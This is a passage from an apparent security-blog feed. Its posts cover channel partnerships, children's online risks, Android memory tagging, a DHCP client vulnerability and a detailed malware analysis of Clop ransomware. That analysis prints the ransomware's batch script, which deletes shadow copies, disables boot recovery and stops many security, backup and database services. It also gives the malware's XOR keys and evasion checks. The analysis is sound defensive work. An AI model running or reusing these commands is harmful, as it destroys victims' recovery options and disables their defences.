We do this through resellers, system integrators, distributors, OEMs (original equipment manufacturers), security consultants, and service providers.

Our channel community enables us to meet the demands of an ever-changing landscape of customer expectations, consumption models, competitive threats, and shifting markets.

Without Our Channel Community, McAfee Would:

Lack alternative consumption and purchasing options for customers

Sacrifice sales and operational capacity

Increase financial risk and exposure

Lose scale and market presence globally

Miss out on competitive insights

Incur additional go-to-market costs

I AM McAfee Channel

To Our Channel Partners

We are your partner and your primary advocate inside McAfee.

To Our Company

We are a growth catalyst that helps deliver on our customers’ value drivers at scale, provide deeper customer relationships, and position McAfee as the cybersecurity market leader.

To Our Channel Employees

We are the place to be within McAfee. We embody our company values in all that we do, and we believe that “Together is power.” We foster strong partnerships with and through our channel partners to increase McAfee’s market share and maintain our position as cybersecurity leader, build deeper customer relationships, and help keep the world safe from cyberthreats.

I AM McAfee Channel, and I hope that if you’re a partner with McAfee, this message resonates with you. I know it does with our team, and we are proud to be a part of this partnership with you. Your feedback is welcome in the comments.

The post The McAfee Americas Channel Promise appeared first on McAfee Blogs.

Test Your Knowledge on How Businesses Use and Secure the Cloud

Security used to be an inhibitor to cloud adoption, but now the tables have turned, and for the first time we are seeing security professionals embrace the cloud as a more secure environment for their business. Not only are they finding it more secure, but the benefits of cloud adoption are being accelerated in-step with better security.

Do you know what’s shaping our new world of secure cloud adoption? Do you know what the best practices are for you to accelerate your own business with the cloud? Test your knowledge in this quiz.

Note: There is a widget embedded within this post, please visit the site to participate in this post's widget.

Not prepared? Lucky for you this is an “open-book” test. Find some cheat sheets and study guides below.

Report: Cloud Adoption and Risk Report: Business Growth Edition

Blog: Top Findings from the Cloud Adoption and Risk Report: Business Growth Edition

Blog: Why Security Teams Have Come to Embrace the Cloud

MVISION Cloud Data Sheet

MVISION Cloud

The post Test Your Knowledge on How Businesses Use and Secure the Cloud appeared first on McAfee Blogs.

5 Digital Risks That Could Affect Your Kids This New School Year

digital risks

digital risksStarting a new school year is both exciting and stressful for families today. Technology has magnified learning and connection opportunities for our kids but not without physical and emotional costs that we can’t overlook this time of year.

But the transition from summer to a new school year offers families a fresh slate and the chance to evaluate what digital ground rules need to change when it comes to screen time. So as you consider new goals, here are just a few of the top digital risks you may want to keep on your radar.

  1. Cyberbullying. The online space for a middle or high school student can get ugly this time of year. In two years, cyberbullying has increased significantly from 11.5% to 15.3%. Also, three times as many girls reported being harassed online or by text than boys, according to the U.S. Department of Education.
    Back-to-School Tip: Keep the cyberbullying discussion honest and frequent in your home. Monitor your child’s social media apps if you have concerns that cyberbullying may be happening. To do this, click the social icons periodically to explore behind the scenes (direct messages, conversations, shared photos). Review and edit friend lists, maximize location and privacy settings, and create family ground rules that establish expectations about appropriate digital behavior, content, and safe apps.Make an effort to stay current on the latest social media apps, trends, and texting slang so you can spot red flags. Lastly, be sure kids understand the importance of tolerance, empathy, and kindness among diverse peer groups.
  2. Oversharing. Did you know that 30% of parents report posting a photo of their child(ren) to social media at least once per day, and 58% don’t ask permission? By the age of 13, studies estimate that parents have posted about 1,300 photos and videos of their children online. A family’s collective oversharing can put your child’s privacy, reputation, and physical safety at risk. Besides, with access to a child’s personal information, a cybercriminal can open fraudulent accounts just about anywhere.
    Back-to-School Tip: Think before you post and ask yourself, “Would I be okay with a stranger seeing this photo?” Make sure there is nothing in the photo that could be an identifier such as a birthdate, a home address, school uniforms, financial details, or password hints. Also, maximize privacy settings on social networks and turn off photo geo-tagging that embeds photos with a person’s exact coordinates. Lastly, be sure your child understands the lifelong consequences that sharing explicit photos can have on their lives.
  3. Mental health + smartphone use. There’s no more disputing it (or indulging tantrums that deny it) smartphone use and depression are connected. Several studies of teens from the U.S. and U.K. reveal similar findings: That happiness and mental health are highest at 30 minutes to two hours of extracurricular digital media use a day. Well-being then steadily decreases, according to the studies, revealing that heavy users of electronic devices are twice as unhappy, depressed, or distressed as light users.
    Back-to-School Tip: Listen more and talk less. Kids tend to share more about their lives, friends, hopes, and struggles if they believe you are truly listening and not lecturing. Nurturing a healthy, respectful, mutual dialogue with your kids is the best way to minimize a lot of the digital risks your kids face every day. Get practical: Don’t let your kids have unlimited phone use. Set and follow media ground rules and enforce the consequences of abusing them.
  4. Sleep deprivation. Sleep deprivation connected to smartphone use can dramatically increase once the hustle of school begins and Fear of Missing Out (FOMO) accelerates. According to a 2019 Common Sense Media survey, a third of teens take their phones to bed when they go to sleep; 33% girls versus 26% of boys. Too, 1 in 3 teens reports waking up at least once per night and checking their phones.digital risks
    Back-to-School Tip:
    Kids often text, playing games, watch movies, or YouTube videos randomly scroll social feeds or read the news on their phones in bed. For this reason, establish a phone curfew that prohibits this. Sleep is food for the body, and tweens and teens need about 8 to 10 hours to keep them healthy. Discuss the physical and emotional consequences of losing sleep, such as sleep deprivation, increased illness, poor grades, moodiness, anxiety, and depression.
  5. School-related cyber breaches. A majority of schools do an excellent job of reinforcing the importance of online safety these days. However, that doesn’t mean it’s own cybersecurity isn’t vulnerable to cyber threats, which can put your child’s privacy at risk. Breaches happen in the form of phishing emails, ransomware, and any loopholes connected to weak security protocols.
    Back-to-School Tip: Demand that schools be transparent about the data they are collecting from students and families. Opt-out of the school’s technology policy if you believe it doesn’t protect your child or if you sense an indifferent attitude about privacy. Ask the staff about its cybersecurity policy to ensure it has a secure password, software, and network standards that could affect your family’s data is compromised.

Stay the course, parent, you’ve got this. Armed with a strong relationship and media ground rules relevant to your family, together, you can tackle any digital challenge the new school year may bring.

The post 5 Digital Risks That Could Affect Your Kids This New School Year appeared first on McAfee Blogs.

Adopting the Arm Memory Tagging Extension in Android

As part of our continuous commitment to improve the security of the Android ecosystem, we are partnering with Arm to design the memory tagging extension (MTE). Memory safety bugs, common in C and C++, remain one of the largest vulnerabilities in the Android platform and although there have been previous hardening efforts, memory safety bugs comprised more than half of the high priority security bugs in Android 9. Additionally, memory safety bugs manifest as hard to diagnose reliability problems, including sporadic crashes or silent data corruption. This reduces user satisfaction and increases the cost of software development. Software testing tools, such as ASAN and HWASAN help, but their applicability on current hardware is limited due to noticeable overheads.

MTE, a hardware feature, aims to further mitigate these memory safety bugs by enabling us to detect them with low overhead. It has two execution modes:

  • Precise mode: Provides more detailed information about the memory violation
  • Imprecise mode: Has lower CPU overhead and is more suitable to be always-on.

Arm recently published a whitepaper on MTE and has added documentation to the Arm v8.5 Architecture Reference Manual.

We envision several different usage modes for MTE.

  • MTE provides a version of ASAN/HWASAN that is easier to use for testing and fuzzing in laboratory environments. It will find more bugs in a fraction of the time and at a lower cost, reducing the complexity of the development process. In many cases, MTE will allow testing memory safety using the same binary as shipped to production. The bug reports produced by MTE will be as detailed and actionable as those from ASAN and HWASAN.
  • MTE will be used as a mechanism for testing complex software scenarios in production. App Developers and OEMs will be able to selectively turn on MTE for parts of the software stack. Where users have provided consent, bug reports will be available to developers via familiar mechanisms like Google Play Console.
  • MTE can be used as a strong security mitigation in the Android System and applications for many classes of memory safety bugs. For most instances of such vulnerabilities, a probabilistic mitigation based on MTE could prevent exploitation with a higher than 90% chance of detecting each invalid memory access. By implementing these protections and ensuring that attackers can't make repeated attempts to exploit security-critical components, we can significantly reduce the risk to users posed by memory safety issues.

We believe that memory tagging will detect the most common classes of memory safety bugs in the wild, helping vendors identify and fix them, discouraging malicious actors from exploiting them. During the past year, our team has been working to ensure readiness of the Android platform and application software for MTE. We have deployed HWASAN, a software implementation of the memory tagging concept, to test our entire platform and a few select apps. This deployment has uncovered close to 100 memory safety bugs. The majority of these bugs were detected on HWASAN enabled phones in everyday use. MTE will greatly improve upon this in terms of overhead, ease of deployment, and scale. In parallel, we have been working on supporting MTE in the LLVM compiler toolchain and in the Linux kernel. The Android platform support for MTE will be complete by the time of silicon availability.

Google is committed to supporting MTE throughout the Android software stack. We are working with select Arm System On Chip (SoC) partners to test MTE support and look forward to wider deployment of MTE in the Android software and hardware ecosystem. Based on the current data points, MTE provides tremendous benefits at acceptable performance costs. We are considering MTE as a possible foundational requirement for certain tiers of Android devices.

Thank you to Mitch Phillips, Evgenii Stepanov, Vlad Tsyrklevich, Mark Brand, and Serban Constantinescu for their contributions to this post.

Grasshoppers, Dead Cow, and Controlled Chaos: What We’re Looking Forward to at Black Hat USA

Veracode Black Hat USA 2019 Las Vegas

Usually, Black Hat USA is all the rage this time of year when it comes to Las Vegas; however, it seems the excitement about the show has been eclipsed by a grasshopper invasion. I admit, I was puzzled when my colleagues informed me of the news and proceeded to show me the horrifying photographic and video evidence. I joked that I would need to wear a Veracode-branded beekeeper suit, and wondered what the symbolism of the grasshopper is. So before I get to what you really care about – Black Hat – I leave you with two fun facts:

  1. Upon asking my mother – a Las Vegas resident – about the grasshopper invasion, she informed me that this happens every year, but it usually isn’t this bad. And that her side of town has significantly less grasshoppers.
  2. Grasshoppers can’t move sideways or backwards, they can only take big leaps forward. Seems apt when we’re considering the future of security and development.  

Without further ado, here are three events I’m most looking forward to attending at this year’s show:

Controlled Chaos: The Inevitable Marriage of DevOps & Security

Kelly Shortridge, VP of Product Strategy at Capsule8, and Dr. Nicole Forsgren, Research & Strategy at Google Cloud, will take a closer look at the choice information security has to make when it comes to DevOps: marry with their DevOps colleagues and embrace the philosophy of controlled chaos, or eventually lose the race, because software – secure software especially – is a competitive differentiator in today’s global economy. I’m curious to see Shortridge and Forsgren’s take on DevOps, the concepts of resilience and chaos engineering, and the impact on the future of security programs.

Where: South Pacific When: Aug. 7 from 4-4:50 p.m. Read More: Here

All Things Cult of the Dead Cow

Remember when much of the nation was astonished to learn that presidential candidate Beto O’Rourke was a member of America’s oldest hacking group, The Cult of the Dead Cow (cDc)? This was after Reuters reporter Joseph Menn published a special report that was adapted from his book Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World. While I’ll be sure to check out the briefing at BHUSA, at Veracode, we’re excited to host a conversation with Menn, Chris Wysopal, Veracode's CTO, Christien Rioux, Software Architect at Flowmill, and Luke Benfey - Deth Veggie – cDc Minister of Propaganda, for a discussion about the new book at our booth. Plus, we’re donating $2 to BuildOn for every booth visit.

Where: Booth #854 When: Aug. 7 from 5-6:30 p.m. Read More: Here

DevSecOps: What, Why and How

When it comes to development, security is often added towards the end of the DevOps cycle through a manual/automated review – but we know it doesn’t have to be that way. Security can actually be integrated – and automated – at each stage of the DevOps pipeline. In this briefing, Anant Shrivastava from NotSoSecure will dive into the technology and cultural aspects of DevSecOps, and the changes needed to get tangible benefits. Shrivastava will also present case studies on how critical bugs and security breaches affecting popular software and applications could have been prevented using a simple DevSecOps approach.

Where: South Pacific When: Aug. 8 from 11-11:50 a.m. Read More: Here

We’d love to talk to you about your own development shop and security practices during the show, so please stop by Booth #854 – we’ve got demos, spun chairs, and we’ll send you home with a one-of-a-kind custom t-shirt.

I’m not sure I’ll be able to score that branded beekeeper suit, but I’m looking forward to seeing everything Black Hat has to offer. If you’re open to sharing what you’re looking forward to at the show, let’s connected on Twitter (@lauraleapaine) so I can get your perspective. Make sure to check back here for live coverage – or subscribe to get our content updates sent directly to your inbox.

DHCP Client Remote Code Execution Vulnerability Demystified

CVE-2019-0547

CVE-2019-0547 was the first vulnerability patched by Microsoft this year. The dynamic link library, dhcpcore.dll, which is responsible for DHCP client services in a system, is vulnerable to malicious DHCP reply packets.

This vulnerability allows remote code execution if the user tries to connect to a network with a rogue DHCP Server, hence making it a critical vulnerability.

DHCP protocol overview

DHCP is a client-server protocol used to dynamically assign IP address when a computer connects to a network. DHCP server listens on port 67 and is responsible for distributing IP addresses to DHCP clients and allocating TCP/IP configuration to endpoints.

The DHCP hand shake is represented below:

During DHCP Offer and DHCP Ack, the packet contains all the TCP/IP configuration information required for a client to join the network. The structure of a DHCP Ack packet is shown below:

The options field holds several parameters required for basic DHCP operation. One of the options in the Options field is Domain Search (type field is 119).

Domain Search Option field (RFC 3397)

This option is passed along with OFFER and ACK packets to the client to specify the domain search list used when resolving hostnames using DNS. The format of the DHCP option field is as follows:

To enable the searchlist to be encoded compactly, searchstrings in the searchlist are concatenated and encoded.

A list of domain names, such as  www.example.com and dns.example.com are encoded thus:

Vulnerability

There is a vulnerability in the DecodeDomainSearchListData function of dhcpcore.dll.

The DecodeDomainSearchListData function decodes the encoded search list option field value. While decoding, the function calculates the length of the decoded domain name list and allocates memory and copies the decoded list.

A malicious user can create an encoded search list, such that when DecodeDomainSearchListData function decodes, the resulting length is zero. This will lead to heapalloc with zero memory, resulting in an out-of-bound write.

Patch

The patch includes a check which ensures the size argument to HeapAlloc is not zero. If zero, the function exits.

Conclusion

A rogue DHCP server in the network can exploit this vulnerability, by replying to the DHCP request from the clients. This rogue DHCP server can also be a wireless access point which a user connects. Successful exploitation of this vulnerability can trigger a code execution in the client and take control of the system.

McAfee NSP customers are protected from this attack by signature “0x42602000”.

The post DHCP Client Remote Code Execution Vulnerability Demystified appeared first on McAfee Blogs.

Clop Ransomware

This new ransomware was discovered by Michael Gillespie on 8 February 2019 and it is still improving over time. This blog will explain the technical details and share information about how this new ransomware family is working. There are some variants of the Clop ransomware but in this report, we will focus on the main version and highlight part of those variations. The main goal of Clop is to encrypt all files in an enterprise and request a payment to receive a decryptor to decrypt all the affected files. To achieve this, we observed some new techniques being used by the author that we have not seen before. Clearly over the last few months we have seen more innovative techniques appearing in ransomware.

Clop Overview

The Clop ransomware is usually packed to hide its inner workings. The sample we analyzed was also signed with the following certificate in the first version (now revoked):

FIGURE 1. Packer signed to avoid av programs and mislead the user

Signing a malicious binary, in this case ransomware, may trick security solutions to trust the binary and let it pass. Although this initial certificate was revoked in a few days, another version appeared soon after with another certificate:

FIGURE 2. New certificate in new version

This sample was discovered by MalwareHunterTeam (https://twitter.com/malwrhunterteam) on the 26 February, 2019.

We discovered the following Clop ransomware samples which were signed with a certificate:

This malware is prepared to avoid running under certain conditions, for example in the first version it requests to be installed as a service; if that will not succeed, it will terminate itself.

The malware’s first action is to compare the keyboard of the victim computer using the function “GetKeyboardLayout”  against the hardcoded values.

This function returns the user keyboard input layout at the moment the malware calls the function.

The malware checks that the layout is bigger than the value 0x0437 (Georgian), makes some calculations with the Russian language (0x0419) and with the Azerbaijan language (0x082C). This function will return 1 or 0, 1 if it belongs to Russia or another CIS country, or 0 in every other case.

FIGURE 3. Checking the keyboard layout

If the function returns 0, it will go to the normal flow of the malware, otherwise it will get the device context of the entire screen with the function “GetDC”. Another condition will come from the function “GetTextCharset” that returns the font used in the system if it does not have the value 0xCC (RUSSIAN_CHARSET). If it is the charset used, the malware will delete itself from the disk and terminate itself with “TerminateProcess” but if it is not this charset, it will continue in the normal flow This double check circumvents users with a multisystem language, i.e. they have the Russian language installed but not active in the machine to avoid this type of malware.

FIGURE 4. Check the text charset and compare with Russian charset

The code that is supposed to delete the ransomware from the disk contains an error. It will call directly to the prompt of the system without waiting for the malware to finish.  This means that the execution of the command will be correct but, as the malware is still running, it will not delete it from the disk. This happens because the author did not use a “timeout” command.

FIGURE 5. Deletion of the malware itself

The next action of the malware is to create a new thread that will start all processes. With the handle of this thread, it will wait for an infinite amount of time to finish with the “WaitForSingleObject” function and later return to the winMain function and exit.

This thread’s first action is to create a file called “Favorite” in the same folder as the malware. Later, it will check the last error with “GetLastError” and, if the last error was 0,  it will wait with the function “Sleep” for 5 seconds.

Later the thread will make a dummy call to the function “EraseTape” with a handle of 0, perhaps to disturb the emulators because the handle is put at 0 in a hardcoded opcode, and later a call to the function “DefineDosDeviceA” with an invalid name that returns another error. These operations will make a loop for 666000 times.

FIGURE 6. Loop to disturb the analysis

The next action is to search for some processes with these names:

  • SBAMTray.exe (Vipre antivirus product)
  • SBPIMSvc.exe (Sunbelt AntiMalware antivirus product)
  • SBAMSvc.exe (GFI AntiMalware antivirus product)
  • VipreAAPSvc.exe (Vipre antivirus product)
  • WRSA.exe (WebRoot antivirus product)

If some of these processes are discovered, the malware will wait 5 seconds using “Sleep” and later another 5 seconds. After those “sleep”, the malware will continue with their normal flow. If these processes are not detected, it will access to their own resources and extract it with the name “OFFNESTOP1”. That resource is encrypted but has inside a “.bat” file.

FIGURE 7. Access to the first resource crypted

The decryption is a simple XOR operation with bytes from this string:

“Po39NHfwik237690t34nkjhgbClopfdewquitr362DSRdqpnmbvzjkhgFD231ed76tgfvFAHGVSDqhjwgdyucvsbCdigr1326dvsaghjvehjGJHGHVdbas”.

The next action is to write this batch file in the same folder where the malware stays with the function “CreateFileA”.  The file created has the name “clearsystems-11-11.bat”. Later will launch it with “ShellExecuteA”, wait for 5 seconds to finish and delete the file with the function “DeleteFileA”.

It is clear that the authors are not experienced programmers because they are using a .bat file for the next actions:

  • Delete the shadow volumes with vssadmin (“vssadmin Delete Shadows /all /quiet”).
  • Resize the shadow storage for all units starting from C to H units’ letters (hardcoded letters) to avoid the shadow volumes being made again.
  • Using bcedit program to disable the recovery options in the boot of the machine and set to ignore any failure in the boot warning the user.

All these actions could have been performed in the malware code itself, without the need of an external file that can be detected and removed.

FIGURE 8. The BAT file to disable the shadow volumes and more security

The next action is to create a mutex with the name hardcoded “Fany—Fany—6-6-6” and later make a call to the function “WaitForSingleObject” and check the result with 0.  If the value is 0 it means that the mutex was created for this instance of the malware but if it gets another value, it means that the mutex was made from another instance or vaccine and, in this case, it will finish the execution of the malware.

After this, it will make 2 threads, one of them to search for processes and the another one to crypt files in the network shares that it has access to.

The first thread enumerates all processes of the system and creates the name of the process in upper case and calculates a hash with the name and compares it with a big list of hashes. This hash algorithm is a custom algorithm. It is typical in malware that tries to hide what processes they are looking for. If it finds one of them it will terminate it with “TerminateProcess” function after opening with the rights to make this action with “OpenProcess” function.

The malware contains 61 hard-coded hashes of programs such as “STEAM.EXE”, database programs, office programs and others.

Below, the first 38 hashes with the associated process names. These 38 processes are the most usual processes to close as we have observed with other ransomwares families such as GandCrab, Cerber, etc.

This thread runs in an infinite loop with a wait using the function “Sleep” per iteration of 30 minutes.

FIGURE 9. Thread to kill critical processes to unlock files

The second thread created has the task of enumerating all network shares and crypts files in them if the malware has access to them.

For executing this task, it uses the typical API functions of the module “MPR.DLL”:

  • WNetOpenEnumW
  • WNetEnumResourceW
  • WNetCloseEnum

This thread starts creating a reserve of memory with “GlobalAlloc” function to keep the information of the “MPR” functions.

For each network share that the malware discovers, it will prepare to enumerate more shares and crypt files.

For each folder discovered, it will enter it and search for more subfolders and files. The first step is to check the name of the folder/file found against a hardcoded list of hashes with the same algorithm used to detect the processes to close.

Below are the results of 12 of the 27 hashes with the correct names:

If it passes, it will check that the file is not a folder, and in this case compare the name with a list of hardcoded names and extensions that are in plain text rather than in hash format:

  • ClopReadMe.txt
  • ntldr
  • NTDLR
  • boot.ini
  • BOOT.INI
  • ntuser.ini
  • NTUSER.INI
  • AUTOEXEC.BAT
  • autoexec.bat
  • .Clop
  • NTDETECT.COM
  • ntdetect.com
  • .dll
  • .DLL
  • .exe
  • .EXE
  • .sys
  • .SYS
  • .ocx
  • .OCX
  • .LNK
  • .lnk
  • desktop.ini
  • autorun.inf
  • ntuser.dat
  • iconcache.db
  • bootsect.bak
  • ntuser.dat.log
  • thumbs.db
  • DESKTOP.INI
  • AUTORUN.INF
  • NTUSER.DAT
  • ICONCACHE.DB
  • BOOTSECT.BAK
  • NTUSER.DATA.LOG
  • THUMBS.DB

This check is done with a custom function that checks character per character against all the list. It is the reason for having the same names in both upper and lower case, instead of using the function “lstrcmpiA,” for example, to avoid some hook in this function preventing the file from being affected. The check of the extension at the same time is to make the process of crypto quicker. Of course, the malware checks that the file does not have the name of the ransom note and the extension that it will put in the crypted file. Those blacklisted extensions will help the system avoid crashing during the encryption compared with other ransomware families.

FIGURE 10. Check of file names and extensions

This behavior is normal in ransomware but the previous check against hardcoded hashes based on the file/folder name is weird because later, as we can see in the above picture, the next check is against plain text strings.

If it passes this check, the malware will make a new thread with a struct prepared with a hardcoded key block, the name of the file, and the path where the file exists. In this thread the first action is to remove the error mode with “SetErrorMode” to 1 to avoid an error dialog being shown to the user if it crashes. Later, it will prepare the path to the file from the struct passed as argument to the thread and change the attributes of the file to ARCHIVE with the function “SetFileAttributesW”, however the malware does not check if it can make this action with success or not.

Later it will generate a random AES key and crypt each byte of the file with this key, next it will put the mark “Clop^_” at the end of the file, after the mark it will put the key used to crypt the file ciphered with the master RSA key that has hardcoded the malware to protect it against third party free decryptors.

The malware can use 2 different public RSA keys: one exported using the crypto api in a public blob or using the embedded in base64 in the malware. The malware will only use the second one if it cannot create the crypto context or has some problem with the crypto api functions.

The malware does not have support for Windows XP in its use with the crypto functions, because the CSP used in Windows XP has another name, but if run in another operating system starting with Windows Vista, it can change the name in the debugger to acquire the context later and will generate a RSA public blob.

Another difference with other ransomware families is that Clop will only cipher the disk that is a physical attached/embedded disk (type 3, FIXED or removable (type 2)). The malware ignores the REMOTE type (4)).

Anyways, the shares can be affected using the “MPR.DLL” functions without any problem.

FIGURE 11. Filemark in the crypted file and key used ciphered

After encrypting, the file will try to open in the same folder the ransom note and, if it exists, it will continue without overwriting it to save time, but if the ransom note does not exist it will access one resource in the malware called “OFFNESTOP”. This resource is crypted with the same XOR operation as the first resource: the .bat file, after decrypting, will write the ransom note in the folder of the file.

FIGURE 12. Creation of the ransom note from a crypted resource

Here is a sample of the ransom note of the first version of this malware:

FIGURE 13. Example of ransom note of the first version of the malware

After this, Clop will continue with the next file with the same process however, the check of the name based with the hash is avoided now.

Second Version of the Malware

The second version found by the end of February has some changes if it is compared with the first one. The hash of this version is: “ed7db8c2256b2d5f36b3d9c349a6ed0b”.

The first change is some changes in the strings in plain text of the code to make the execution in the “EraseTape” call and “FindAtomW” call more slowly. Now the names are for the tape: “” and the atom “”.

The second change is the name of the resources crypted in the binary, the first resource that is a second batch file to delete the shadow volumes and remove the protections in the boot of the machine as the previous one has another name: “RC_HTML1”.

FIGURE 14. New resource name for the batch file

However, the algorithm to decrypt this resource is the same, except that they changed the big string that acts as a key for the bytes. Now the string is: “JLKHFVIjewhyur3ikjfldskfkl23j3iuhdnfklqhrjjio2ljkeosfjh7823763647823hrfuweg56t7r6t73824y78Clop”. It is important to remember that this string remains in plain text in the binary but, as it has changed, it cannot be used for a Yara rule. The same counts for the name of the resources and also for the hash of the resource because the bat changes per line in some cases and in another as it will have more code to stop services of products of security and databases.

The contents of the new BAT file are:

@echo off

vssadmin Delete Shadows /all /quiet

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

bcdedit /set {default} recoveryenabled No

bcdedit /set {default} bootstatuspolicy ignoreallfailures

vssadmin Delete Shadows /all /quiet

net stop SQLAgent$SYSTEM_BGC /y

net stop “Sophos Device Control Service” /y

net stop macmnsvc /y

net stop SQLAgent$ECWDB2 /y

net stop “Zoolz 2 Service” /y

net stop McTaskManager /y

net stop “Sophos AutoUpdate Service” /y

net stop “Sophos System Protection Service” /y

net stop EraserSvc11710 /y

net stop PDVFSService /y

net stop SQLAgent$PROFXENGAGEMENT /y

net stop SAVService /y

net stop MSSQLFDLauncher$TPSAMA /y

net stop EPSecurityService /y

net stop SQLAgent$SOPHOS /y

net stop “Symantec System Recovery” /y

net stop Antivirus /y

net stop SstpSvc /y

net stop MSOLAP$SQL_2008 /y

net stop TrueKeyServiceHelper /y

net stop sacsvr /y

net stop VeeamNFSSvc /y

net stop FA_Scheduler /y

net stop SAVAdminService /y

net stop EPUpdateService /y

net stop VeeamTransportSvc /y

net stop “Sophos Health Service” /y

net stop bedbg /y

net stop MSSQLSERVER /y

net stop KAVFS /y

net stop Smcinst /y

net stop MSSQLServerADHelper100 /y

net stop TmCCSF /y

net stop wbengine /y

net stop SQLWriter /y

net stop MSSQLFDLauncher$TPS /y

net stop SmcService /y

net stop ReportServer$TPSAMA /y

net stop swi_update /y

net stop AcrSch2Svc /y

net stop MSSQL$SYSTEM_BGC /y

net stop VeeamBrokerSvc /y

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

net stop VeeamDeploymentService /y

net stop SQLAgent$TPS /y

net stop DCAgent /y

net stop “Sophos Message Router” /y

net stop MSSQLFDLauncher$SBSMONITORING /y

net stop wbengine /y

net stop MySQL80 /y

net stop MSOLAP$SYSTEM_BGC /y

net stop ReportServer$TPS /y

net stop MSSQL$ECWDB2 /y

net stop SntpService /y

net stop SQLSERVERAGENT /y

net stop BackupExecManagementService /y

net stop SMTPSvc /y

net stop mfefire /y

net stop BackupExecRPCService /y

net stop MSSQL$VEEAMSQL2008R2 /y

net stop klnagent /y

net stop MSExchangeSA /y

net stop MSSQLServerADHelper /y

net stop SQLTELEMETRY /y

net stop “Sophos Clean Service” /y

net stop swi_update_64 /y

net stop “Sophos Web Control Service” /y

net stop EhttpSrv /y

net stop POP3Svc /y

net stop MSOLAP$TPSAMA /y

net stop McAfeeEngineService /y

net stop “Veeam Backup Catalog Data Service” /

net stop MSSQL$SBSMONITORING /y

net stop ReportServer$SYSTEM_BGC /y

net stop AcronisAgent /y

net stop KAVFSGT /y

net stop BackupExecDeviceMediaService /y

net stop MySQL57 /y

net stop McAfeeFrameworkMcAfeeFramework /y

net stop TrueKey /y

net stop VeeamMountSvc /y

net stop MsDtsServer110 /y

net stop SQLAgent$BKUPEXEC /y

net stop UI0Detect /y

net stop ReportServer /y

net stop SQLTELEMETRY$ECWDB2 /y

net stop MSSQLFDLauncher$SYSTEM_BGC /y

net stop MSSQL$BKUPEXEC /y

net stop SQLAgent$PRACTTICEBGC /y

net stop MSExchangeSRS /y

net stop SQLAgent$VEEAMSQL2008R2 /y

net stop McShield /y

net stop SepMasterService /y

net stop “Sophos MCS Client” /y

net stop VeeamCatalogSvc /y

net stop SQLAgent$SHAREPOINT /y

net stop NetMsmqActivator /y

net stop kavfsslp /y

net stop tmlisten /y

net stop ShMonitor /y

net stop MsDtsServer /y

net stop SQLAgent$SQL_2008 /y

net stop SDRSVC /y

net stop IISAdmin /y

net stop SQLAgent$PRACTTICEMGT /y

net stop BackupExecJobEngine /y

net stop SQLAgent$VEEAMSQL2008R2 /y

net stop BackupExecAgentBrowser /y

net stop VeeamHvIntegrationSvc /y

net stop masvc /y

net stop W3Svc /y

net stop “SQLsafe Backup Service” /y

net stop SQLAgent$CXDB /y

net stop SQLBrowser /y

net stop MSSQLFDLauncher$SQL_2008 /y

net stop VeeamBackupSvc /y

net stop “Sophos Safestore Service” /y

net stop svcGenericHost /y

net stop ntrtscan /y

net stop SQLAgent$VEEAMSQL2012 /y

net stop MSExchangeMGMT /y

net stop SamSs /y

net stop MSExchangeES /y

net stop MBAMService /y

net stop EsgShKernel /y

net stop ESHASRV /y

net stop MSSQL$TPSAMA /y

net stop SQLAgent$CITRIX_METAFRAME /y

net stop VeeamCloudSvc /y

net stop “Sophos File Scanner Service” /y

net stop “Sophos Agent” /y

net stop MBEndpointAgent /y

net stop swi_service /y

net stop MSSQL$PRACTICEMGT /y

net stop SQLAgent$TPSAMA /y

net stop McAfeeFramework /y

net stop “Enterprise Client Service” /y

net stop SQLAgent$SBSMONITORING /y

net stop MSSQL$VEEAMSQL2012 /y

net stop swi_filter /y

net stop SQLSafeOLRService /y

net stop BackupExecVSSProvider /y

net stop VeeamEnterpriseManagerSvc /y

net stop SQLAgent$SQLEXPRESS /y

net stop OracleClientCache80 /y

net stop MSSQL$PROFXENGAGEMENT /y

net stop IMAP4Svc /y

net stop ARSM /y

net stop MSExchangeIS /y

net stop AVP /y

net stop MSSQLFDLauncher /y

net stop MSExchangeMTA /y

net stop TrueKeyScheduler /y

net stop MSSQL$SOPHOS /y

net stop “SQL Backups” /y

net stop MSSQL$TPS /y

net stop mfemms /y

net stop MsDtsServer100 /y

net stop MSSQL$SHAREPOINT /y

net stop WRSVC /y

net stop mfevtp /y

net stop msftesql$PROD /y

net stop mozyprobackup /y

net stop MSSQL$SQL_2008 /y

net stop SNAC /y

net stop ReportServer$SQL_2008 /y

net stop BackupExecAgentAccelerator /y

net stop MSSQL$SQLEXPRESS /y

net stop MSSQL$PRACTTICEBGC /y

net stop VeeamRESTSvc /y

net stop sophossps /y

net stop ekrn /y

net stop MMS /y

net stop “Sophos MCS Agent” /y

net stop RESvc /y

net stop “Acronis VSS Provider” /y

net stop MSSQL$VEEAMSQL2008R2 /y

net stop MSSQLFDLauncher$SHAREPOINT /y

net stop “SQLsafe Filter Service” /y

net stop MSSQL$PROD /y

net stop SQLAgent$PROD /y

net stop MSOLAP$TPS /y

net stop VeeamDeploySvc /y

net stop MSSQLServerOLAPService /y

The next change is the mutex name. In this version it is “HappyLife^_-“, so, can it be complex to make a vaccine based on the mutex name because it can be changed easily in each new sample.

The next change is the hardcoded public key of the malware that is different to the previous version.

Another change is the file created; the first version creates the file with the name “Favourite” but this version creates this file with the name “Comone”.

However, the algorithm of crypto of the files and the mark in the file crypted is the same.

Another difference is in the ransom note that is now clearer with some changes in the text and now has 3 emails instead of one to contact the ransomware developers.

FIGURE 15.Example of the new ransom note

Other Samples of the Malware

Clop is a ransomware family that its authors or affiliates can change in a quick way to make it more complex to track the samples. The code largely remains the same but changing the strings can make it more difficult to detect and/or classify it correctly.

Now we will talk about the changes of some samples to see how prolific the ransomware Clop is.

